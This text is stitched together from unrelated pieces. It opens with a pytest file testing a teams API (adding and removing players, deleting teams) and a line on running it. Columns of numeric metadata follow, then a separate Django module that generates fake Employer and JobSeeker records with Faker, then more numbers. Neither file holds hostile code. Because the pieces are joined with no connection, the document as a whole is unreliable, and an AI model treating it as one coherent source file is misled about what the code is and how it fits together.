async def test_add_player_to_team__player_not_found():
team_data = {
"name": "team 1",
}
db_team = Team(**team_data)
with dal.get_session_ctx() as session:
session.add(db_team)
session.commit()
session.refresh(db_team)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.patch(f"/teams/{db_team.id}/add-player/-1")
assert response.status_code == 404
assert response.json() == {"detail": "Player not found"}
with dal.get_session_ctx() as session:
session.delete(db_team)
session.commit()
@pytest.mark.asyncio
async def test_add_player_to_team__wrong_user_type():
user_data = {
"username": "user1",
"password": "secret",
}
team_data = {
"name": "team 1",
}
db_team = Team(**team_data)
db_user = User(**user_data)
db_user.user_type = enums.UserType.ADMIN
with dal.get_session_ctx() as session:
session.add(db_team)
session.add(db_user)
session.commit()
session.refresh(db_team)
session.refresh(db_user)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.patch(f"/teams/{db_team.id}/add-player/{db_user.id}")
assert response.status_code == 403
assert response.json() == {
"detail": f"Only players can be part of teams. { db_user } has user_type: { db_user.user_type }"}
with dal.get_session_ctx() as session:
session.delete(db_team)
session.delete(db_user)
session.commit()
@pytest.mark.asyncio
async def test_add_player_to_team__player_already_in_team():
user_data = {
"username": "user1",
"password": "secret",
}
teams_data = [
{
"name": "team 1",
},
{
"name": "team 2",
},
]
db_team1 = Team(**teams_data[0])
db_team2 = Team(**teams_data[1])
db_user = User(**user_data)
db_team1.players.append(db_user)
with dal.get_session_ctx() as session:
session.add(db_team1)
session.add(db_team2)
session.add(db_user)
session.commit()
session.refresh(db_team1)
session.refresh(db_team2)
session.refresh(db_user)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.patch(f"/teams/{db_team1.id}/add-player/{db_user.id}")
assert response.status_code == 403
assert response.json() == {
"detail": f"Player { db_user } is already part of a team"}
with dal.get_session_ctx() as session:
session.delete(db_team1)
session.delete(db_team2)
session.delete(db_user)
session.commit()
@pytest.mark.asyncio
async def test_add_player_to_team__success():
users_data = [
{
"username": "user1",
"password": "secret",
},
{
"username": "user2",
"password": "secret",
}
]
team_data = {
"name": "team 1",
}
db_team = Team(**team_data)
db_user1 = User(**users_data[0])
db_user2 = User(**users_data[1])
db_team.players.append(db_user1)
with dal.get_session_ctx() as session:
session.add(db_team)
session.add(db_user1)
session.add(db_user2)
session.commit()
session.refresh(db_team)
session.refresh(db_user1)
session.refresh(db_user2)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.patch(f"/teams/{db_team.id}/add-player/{db_user2.id}")
with dal.get_session_ctx() as session:
session.add(db_team)
session.refresh(db_team)
team_details = team_schemas.Details.from_orm(db_team)
assert response.status_code == 200
assert response.json() == team_details
with dal.get_session_ctx() as session:
session.delete(db_team)
session.delete(db_user1)
session.delete(db_user2)
session.commit()
# Remove players from team tests
# -------------------------------
@pytest.mark.asyncio
async def test_remove_player_from_team__team_not_found():
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.patch(f"/teams/-1/remove-player/1")
assert response.status_code == 404
assert response.json() == {"detail": "Team not found"}
@pytest.mark.asyncio
async def test_remove_player_from_team__player_not_found():
team_data = {
"name": "team 1"
}
db_team = Team(**team_data)
with dal.get_session_ctx() as session:
session.add(db_team)
session.commit()
session.refresh(db_team)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.patch(f"/teams/{db_team.id}/remove-player/-1")
assert response.status_code == 404
assert response.json() == {"detail": "Player not found"}
with dal.get_session_ctx() as session:
session.delete(db_team)
session.commit()
@pytest.mark.asyncio
async def test_remove_player_from_team__player_not_part_of_the_team():
team_data = {
"name": "team 1",
}
user_data = {
"username": "user1",
"password": "secret",
}
db_team = Team(**team_data)
db_user = User(**user_data)
with dal.get_session_ctx() as session:
session.add(db_team)
session.add(db_user)
session.commit()
session.refresh(db_team)
session.refresh(db_user)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.patch(f"/teams/{db_team.id}/remove-player/{db_user.id}")
assert response.status_code == 403
assert response.json() == {
"detail": f"Player { db_user } is not part of this team"}
with dal.get_session_ctx() as session:
session.delete(db_team)
session.delete(db_user)
session.commit()
@pytest.mark.asyncio
async def test_remove_player_from_team__success():
user_data = {
"username": "user1",
"password": "secret",
}
team_data = {
"name": "team 1",
}
db_team = Team(**team_data)
db_user = User(**user_data)
db_team.players.append(db_user)
with dal.get_session_ctx() as session:
session.add(db_team)
session.add(db_user)
session.commit()
session.refresh(db_team)
session.refresh(db_user)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.patch(f"/teams/{db_team.id}/remove-player/{db_user.id}")
with dal.get_session_ctx() as session:
session.add(db_team)
session.refresh(db_team)
team_details = team_schemas.Details.from_orm(db_team)
assert response.status_code == 200
assert response.json() == team_details
with dal.get_session_ctx() as session:
session.delete(db_team)
session.delete(db_user)
session.commit()
# Delete team tests
# ------------------
@pytest.mark.asyncio
async def test_delete_team__not_found():
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.delete(f"/teams/-1")
assert response.status_code == 404
assert response.json() == {"detail": "Team not found"}
@pytest.mark.asyncio
async def test_delete_team__success():
team_data = {
"name": "team1",
}
db_team = Team(**team_data)
with dal.get_session_ctx() as session:
session.add(db_team)
session.commit()
session.refresh(db_team)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.delete(f"/teams/{db_team.id}")
assert response.status_code == 204
with dal.get_session_ctx() as session:
session.delete(db_team)
session.commit()
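These coroutine tests rely on the pytest-asyncio plugin (hence the @pytest.mark.asyncio markers); assuming it is installed alongside httpx, the file runs with:

pytest tests/test_team.py -v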
| 25.557566
| 105
| 0.639681
| 2,070
| 15,539
| 4.555072
| 0.056039
| 0.050907
| 0.049634
| 0.057694
| 0.896702
| 0.88652
| 0.871036
| 0.866688
| 0.843356
| 0.82819
| 0
| 0.011841
| 0.23367
| 15,539
| 607
| 106
| 25.599671
| 0.77998
| 0.016089
| 0
| 0.724057
| 0
| 0
| 0.097473
| 0.029131
| 0
| 0
| 0
| 0
| 0.108491
| 1
| 0
| false
| 0.018868
| 0.018868
| 0
| 0.018868
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5175ddbc65e54f0b33828dc97e8934264a72e1d5
| 2,364
|
py
|
Python
|
employment_agent/fakers.py
|
ifelsegrandmaster/brithmasoft
|
7e5e514bc4b9dd183470591cce29d5350c0ae25e
|
[
"MIT"
] | null | null | null |
employment_agent/fakers.py
|
ifelsegrandmaster/brithmasoft
|
7e5e514bc4b9dd183470591cce29d5350c0ae25e
|
[
"MIT"
] | null | null | null |
employment_agent/fakers.py
|
ifelsegrandmaster/brithmasoft
|
7e5e514bc4b9dd183470591cce29d5350c0ae25e
|
[
"MIT"
] | null | null | null |
from faker import Faker

from .models import Employer, JobSeeker
class EmployerFaker:
def __init__(self, count):
fake = Faker()
first_names = [fake.unique.first_name() for i in range(count)]
last_names = [fake.unique.last_name() for i in range(count)]
phone_numbers = [fake.unique.phone_number() for i in range(count)]
addresses = [fake.unique.address() for i in range(count)]
emails = [fake.unique.email() for i in range(count)]
job_titles = [fake.unique.sentence() for i in range(count)]
job_descriptions = [fake.unique.sentence() for i in range(count)]
statuses = [fake.boolean() for i in range(count)]
dates_needed = [fake.date() for i in range(count)]
for i in range(count):
            Employer.objects.create(
                firstname=first_names[i],
                lastname=last_names[i],
                phone_number=phone_numbers[i],
                physical_address=addresses[i],
                email_address=emails[i],
                job_title=job_titles[i],
                job_description=job_descriptions[i],
                status=statuses[i],
                date_needed=dates_needed[i],
            )
class JobSeekerFaker:
def __init__(self, count):
fake = Faker()
first_names = [fake.unique.first_name() for i in range(count)]
last_names = [fake.unique.last_name() for i in range(count)]
phone_numbers = [fake.unique.phone_number() for i in range(count)]
addresses = [fake.unique.address() for i in range(count)]
emails = [fake.unique.email() for i in range(count)]
job_titles = [fake.unique.sentence() for i in range(count)]
job_descriptions = [fake.unique.sentence() for i in range(count)]
statuses = [fake.boolean() for i in range(count)]
dates_applied = [fake.date() for i in range(count)]
for i in range(count):
            JobSeeker.objects.create(
                firstname=first_names[i],
                lastname=last_names[i],
                phone_number=phone_numbers[i],
                physical_address=addresses[i],
                email_address=emails[i],
                job_title=job_titles[i],
                status=statuses[i],
                date_applied=dates_applied[i],
            )
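Instantiating a faker class performs the inserts as a side effect of __init__. A minimal usage sketch, e.g. from a Django shell (python manage.py shell):

from employment_agent.fakers import EmployerFaker, JobSeekerFaker

EmployerFaker(10)   # creates 10 fake Employer rows
JobSeekerFaker(10)  # creates 10 fake JobSeeker rows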
| 42.981818
| 74
| 0.585448
| 292
| 2,364
| 4.575342
| 0.167808
| 0.05988
| 0.08982
| 0.164671
| 0.852545
| 0.823353
| 0.823353
| 0.823353
| 0.823353
| 0.823353
| 0
| 0
| 0.306261
| 2,364
| 55
| 75
| 42.981818
| 0.814634
| 0
| 0
| 0.72
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04
| false
| 0
| 0.06
| 0
| 0.14
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|